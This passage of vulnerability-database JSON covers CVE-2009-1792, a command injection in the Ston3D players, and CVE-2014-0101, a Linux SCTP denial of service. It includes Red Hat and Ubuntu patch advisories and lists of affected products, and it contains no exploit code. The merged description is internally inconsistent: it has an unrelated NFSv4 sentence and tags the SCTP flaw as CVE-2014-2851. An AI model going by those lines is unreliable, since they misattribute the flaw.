          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-39238",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-39238"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2009-1792",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "35105",
        "trust": 2.0
      },
      {
        "db": "SECUNIA",
        "id": "35256",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-006041",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200905-326",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "77923",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-39238",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "77968",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-39238"
      },
      {
        "db": "BID",
        "id": "35105"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-006041"
      },
      {
        "db": "PACKETSTORM",
        "id": "77923"
      },
      {
        "db": "PACKETSTORM",
        "id": "77968"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1792"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200905-326"
      }
    ]
  },
  "id": "VAR-200905-0330",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-39238"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T12:58:41.372000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.stonetrip.com/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-006041"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-78",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-39238"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-006041"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1792"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "http://www.coresecurity.com/content/stonetrip-s3dplayers"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/35105"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/archive/1/503887/100/0/threaded"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/35256"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1792"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-1792"
      },
      {
        "trust": 0.3,
        "url": "http://support.microsoft.com/kb/240797"
      },
      {
        "trust": 0.3,
        "url": "http://www.stonetrip.com/"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/503887"
      },
      {
        "trust": 0.1,
        "url": "http://www.stonetrip.com/shiva/shiva-3d-game-engine.html."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1792"
      },
      {
        "trust": 0.1,
        "url": "http://support.microsoft.com/kb/240797)."
      },
      {
        "trust": 0.1,
        "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
      },
      {
        "trust": 0.1,
        "url": "http://www.stonetrip.com/ston3d-players/ston3d-standalone.html."
      },
      {
        "trust": 0.1,
        "url": "http://enigmail.mozdev.org"
      },
      {
        "trust": 0.1,
        "url": "http://www.coresecurity.com/corelabs."
      },
      {
        "trust": 0.1,
        "url": "http://stdn.stonetrip.com."
      },
      {
        "trust": 0.1,
        "url": "http://www.coresecurity.com."
      },
      {
        "trust": 0.1,
        "url": "http://www.stonetrip.com/ston3d-players/ston3d-webplayer.html."
      },
      {
        "trust": 0.1,
        "url": "http://www.coresecurity.com/corelabs/"
      },
      {
        "trust": 0.1,
        "url": "http://www.stonetrip.com."
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/business_solutions/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/35256/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-39238"
      },
      {
        "db": "BID",
        "id": "35105"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-006041"
      },
      {
        "db": "PACKETSTORM",
        "id": "77923"
      },
      {
        "db": "PACKETSTORM",
        "id": "77968"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1792"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200905-326"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-39238"
      },
      {
        "db": "BID",
        "id": "35105"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-006041"
      },
      {
        "db": "PACKETSTORM",
        "id": "77923"
      },
      {
        "db": "PACKETSTORM",
        "id": "77968"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1792"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200905-326"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2009-05-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-39238"
      },
      {
        "date": "2009-05-28T00:00:00",
        "db": "BID",
        "id": "35105"
      },
      {
        "date": "2012-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2009-006041"
      },
      {
        "date": "2009-05-29T02:00:23",
        "db": "PACKETSTORM",
        "id": "77923"
      },
      {
        "date": "2009-06-02T13:39:51",
        "db": "PACKETSTORM",
        "id": "77968"
      },
      {
        "date": "2009-05-29T18:30:00.203000",
        "db": "NVD",
        "id": "CVE-2009-1792"
      },
      {
        "date": "2009-05-29T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200905-326"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-10-10T00:00:00",
        "db": "VULHUB",
        "id": "VHN-39238"
      },
      {
        "date": "2015-04-13T21:10:00",
        "db": "BID",
        "id": "35105"
      },
      {
        "date": "2012-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2009-006041"
      },
      {
        "date": "2021-09-22T14:22:18.110000",
        "db": "NVD",
        "id": "CVE-2009-1792"
      },
      {
        "date": "2021-09-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200905-326"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "77923"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200905-326"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "StoneTrip Ston3D StandalonePlayer and  WebPlayer of  system.openURL Arbitrary command execution vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-006041"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "operating system commend injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200905-326"
      }
    ],
    "trust": 0.6
  }
}

var-201403-0508
Vulnerability from variot

The sctp_sf_do_5_1D_ce function in net/sctp/sm_statefuns.c in the Linux kernel through 3.13.6 does not validate certain auth_enable and auth_capable fields before making an sctp_sf_authenticate call, which allows remote attackers to cause a denial of service (NULL pointer dereference and system crash) via an SCTP handshake with a modified INIT chunk and a crafted AUTH chunk before a COOKIE_ECHO chunk. The Linux kernel is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the affected computer, denying service to legitimate users. The NFSv4 implementation is one of the distributed file system protocols. The vulnerability stems from the fact that the program does not verify the auth_enable and auth_capable fields before calling sctp_sf_authenticate. (CVE-2014-2851)

Sasha Levin reported a bug in the Linux kernel's virtual memory management subsystem. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2014:0419-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0419.html Issue date: 2014-04-22 CVE Names: CVE-2014-0101 =====================================================================

  1. Summary:

Updated kernel packages that fix one security issue and one bug are now available for Red Hat Enterprise Linux 6.3 Extended Update Support.

The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Compute Node EUS (v. 6.3) - noarch, x86_64 Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.3) - x86_64 Red Hat Enterprise Linux Server EUS (v. 6.3) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 6.3) - i386, ppc64, s390x, x86_64

  1. A flaw was found in the way the Linux kernel processed an authenticated COOKIE_ECHO chunk during the initialization of an SCTP connection. (CVE-2014-0101, Important)

Red Hat would like to thank Nokia Siemens Networks for reporting this issue.

This update also fixes the following bug:

  • Due to an incorrect call of the weak-modules script in the kernel spec file, the weak-modules directory was removed from the system when removing or upgrading certain kernel packages related to weak-modules, such as kernel-debug. With this update, the weak-modules call in the kernel spec file has been corrected, and the script now preserves the weak-modules directory on the system in this scenario. (BZ#1076599)

All kernel users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.

  1. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258

To install kernel packages manually, use "rpm -ivh [package]". Do not use "rpm -Uvh" as that will remove the running kernel binaries from your system. You may use "rpm -e" to remove old kernels after determining that the new kernel functions properly on your system.

  1. Package List:

Red Hat Enterprise Linux Compute Node EUS (v. 6.3):

Source: kernel-2.6.32-279.43.1.el6.src.rpm

noarch: kernel-doc-2.6.32-279.43.1.el6.noarch.rpm kernel-firmware-2.6.32-279.43.1.el6.noarch.rpm

x86_64: kernel-2.6.32-279.43.1.el6.x86_64.rpm kernel-debug-2.6.32-279.43.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-279.43.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-279.43.1.el6.x86_64.rpm kernel-devel-2.6.32-279.43.1.el6.x86_64.rpm kernel-headers-2.6.32-279.43.1.el6.x86_64.rpm perf-2.6.32-279.43.1.el6.x86_64.rpm perf-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm

Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.3):

Source: kernel-2.6.32-279.43.1.el6.src.rpm

x86_64: kernel-debug-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-279.43.1.el6.x86_64.rpm perf-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm python-perf-2.6.32-279.43.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm

Red Hat Enterprise Linux Server EUS (v. 6.3):

Source: kernel-2.6.32-279.43.1.el6.src.rpm

i386: kernel-2.6.32-279.43.1.el6.i686.rpm kernel-debug-2.6.32-279.43.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-279.43.1.el6.i686.rpm kernel-debug-devel-2.6.32-279.43.1.el6.i686.rpm kernel-debuginfo-2.6.32-279.43.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-279.43.1.el6.i686.rpm kernel-devel-2.6.32-279.43.1.el6.i686.rpm kernel-headers-2.6.32-279.43.1.el6.i686.rpm perf-2.6.32-279.43.1.el6.i686.rpm perf-debuginfo-2.6.32-279.43.1.el6.i686.rpm python-perf-debuginfo-2.6.32-279.43.1.el6.i686.rpm

noarch: kernel-doc-2.6.32-279.43.1.el6.noarch.rpm kernel-firmware-2.6.32-279.43.1.el6.noarch.rpm

ppc64: kernel-2.6.32-279.43.1.el6.ppc64.rpm kernel-bootwrapper-2.6.32-279.43.1.el6.ppc64.rpm kernel-debug-2.6.32-279.43.1.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-279.43.1.el6.ppc64.rpm kernel-debug-devel-2.6.32-279.43.1.el6.ppc64.rpm kernel-debuginfo-2.6.32-279.43.1.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-279.43.1.el6.ppc64.rpm kernel-devel-2.6.32-279.43.1.el6.ppc64.rpm kernel-headers-2.6.32-279.43.1.el6.ppc64.rpm perf-2.6.32-279.43.1.el6.ppc64.rpm perf-debuginfo-2.6.32-279.43.1.el6.ppc64.rpm python-perf-debuginfo-2.6.32-279.43.1.el6.ppc64.rpm

s390x: kernel-2.6.32-279.43.1.el6.s390x.rpm kernel-debug-2.6.32-279.43.1.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-279.43.1.el6.s390x.rpm kernel-debug-devel-2.6.32-279.43.1.el6.s390x.rpm kernel-debuginfo-2.6.32-279.43.1.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-279.43.1.el6.s390x.rpm kernel-devel-2.6.32-279.43.1.el6.s390x.rpm kernel-headers-2.6.32-279.43.1.el6.s390x.rpm kernel-kdump-2.6.32-279.43.1.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-279.43.1.el6.s390x.rpm kernel-kdump-devel-2.6.32-279.43.1.el6.s390x.rpm perf-2.6.32-279.43.1.el6.s390x.rpm perf-debuginfo-2.6.32-279.43.1.el6.s390x.rpm python-perf-debuginfo-2.6.32-279.43.1.el6.s390x.rpm

x86_64: kernel-2.6.32-279.43.1.el6.x86_64.rpm kernel-debug-2.6.32-279.43.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-279.43.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-279.43.1.el6.x86_64.rpm kernel-devel-2.6.32-279.43.1.el6.x86_64.rpm kernel-headers-2.6.32-279.43.1.el6.x86_64.rpm perf-2.6.32-279.43.1.el6.x86_64.rpm perf-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm

Red Hat Enterprise Linux Server Optional EUS (v. 6.3):

Source: kernel-2.6.32-279.43.1.el6.src.rpm

i386: kernel-debug-debuginfo-2.6.32-279.43.1.el6.i686.rpm kernel-debuginfo-2.6.32-279.43.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-279.43.1.el6.i686.rpm perf-debuginfo-2.6.32-279.43.1.el6.i686.rpm python-perf-2.6.32-279.43.1.el6.i686.rpm python-perf-debuginfo-2.6.32-279.43.1.el6.i686.rpm

ppc64: kernel-debug-debuginfo-2.6.32-279.43.1.el6.ppc64.rpm kernel-debuginfo-2.6.32-279.43.1.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-279.43.1.el6.ppc64.rpm perf-debuginfo-2.6.32-279.43.1.el6.ppc64.rpm python-perf-2.6.32-279.43.1.el6.ppc64.rpm python-perf-debuginfo-2.6.32-279.43.1.el6.ppc64.rpm

s390x: kernel-debug-debuginfo-2.6.32-279.43.1.el6.s390x.rpm kernel-debuginfo-2.6.32-279.43.1.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-279.43.1.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-279.43.1.el6.s390x.rpm perf-debuginfo-2.6.32-279.43.1.el6.s390x.rpm python-perf-2.6.32-279.43.1.el6.s390x.rpm python-perf-debuginfo-2.6.32-279.43.1.el6.s390x.rpm

x86_64: kernel-debug-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-279.43.1.el6.x86_64.rpm perf-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm python-perf-2.6.32-279.43.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package

  1. References:

https://www.redhat.com/security/data/cve/CVE-2014-0101.html https://access.redhat.com/security/updates/classification/#important

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)

iD8DBQFTVqvnXlSAg2UNWIIRAskwAKDFhD3zS1sh/vhrk31MzjZjFuD8kwCfdeRV 1nSgXH01tADV2vYadphGfKs= =2Sa7 -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ============================================================================ Ubuntu Security Notice USN-2225-1 May 27, 2014

linux-lts-saucy vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 12.04 LTS

Summary:

Several security issues were fixed in the kernel.

Software Description: - linux-lts-saucy: Linux hardware enablement kernel from Saucy

Details:

Matthew Daley reported an information leak in the floppy disk driver of the Linux kernel. An unprivileged local user could exploit this flaw to obtain potentially sensitive information from kernel memory. (CVE-2014-1738)

Matthew Daley reported a flaw in the handling of ioctl commands by the floppy disk driver in the Linux kernel. An unprivileged local user could exploit this flaw to gain administrative privileges if the floppy disk module is loaded. (CVE-2014-0055)

A flaw was discovered in the handling of network packets when mergeable buffers are disabled for virtual machines in the Linux kernel. Guest OS users may exploit this flaw to cause a denial of service (host OS crash) or possibly gain privilege on the host OS. (CVE-2014-0077)

Nikolay Aleksandrov discovered a race condition in Linux kernel's IPv4 fragment handling code. (CVE-2014-0100)

A flaw was discovered in the Linux kernel's handling of the SCTP handshake. (CVE-2014-0101)

A flaw was discovered in the handling of routing information in Linux kernel's IPv6 stack. A remote attacker could exploit this flaw to cause a denial of service (memory consumption) via a flood of ICMPv6 router advertisement packets. (CVE-2014-2309)

An error was discovered in the Linux kernel's DCCP protocol support. A remote attacked could exploit this flaw to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2014-2523)

Max Sydorenko discovered a race condition in the Atheros 9k wireless driver in the Linux kernel. (CVE-2014-2672)

Adhemerval Zanella Neto discovered a flaw the in the Transactional Memory (TM) implementation for powerpc based machine. (CVE-2014-2673)

An error was discovered in the Reliable Datagram Sockets (RDS) protocol stack in the Linux kernel. (CVE-2014-2678)

Yaara Rozenblum discovered a race condition in the Linux kernel's Generic IEEE 802.11 Networking Stack (mac80211). (CVE-2014-2706)

A flaw was discovered in the Linux kernel's ping sockets. An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or possibly gain privileges via a crafted application. (CVE-2014-2851)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 12.04 LTS: linux-image-3.11.0-22-generic 3.11.0-22.38~precise1 linux-image-3.11.0-22-generic-lpae 3.11.0-22.38~precise1

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201403-0508",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "big-iq device",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.2.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "big-iq cloud",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.0.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.11"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.4.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip enterprise manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "3.1.1"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.12.15"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.4.84"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "big-iq adc",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.5.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.5"
      },
      {
        "model": "big-ip wan optimization manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip protocol security module",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-iq cloud",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.5.0"
      },
      {
        "model": "big-ip enterprise manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "2.1.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.13.7"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-iq centralized management",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.6.0"
      },
      {
        "model": "big-ip enterprise manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "2.3.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.2.56"
      },
      {
        "model": "big-ip wan optimization manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-ip enterprise manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "3.0.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.10.34"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.4"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.3"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.4"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-iq security",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.0.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
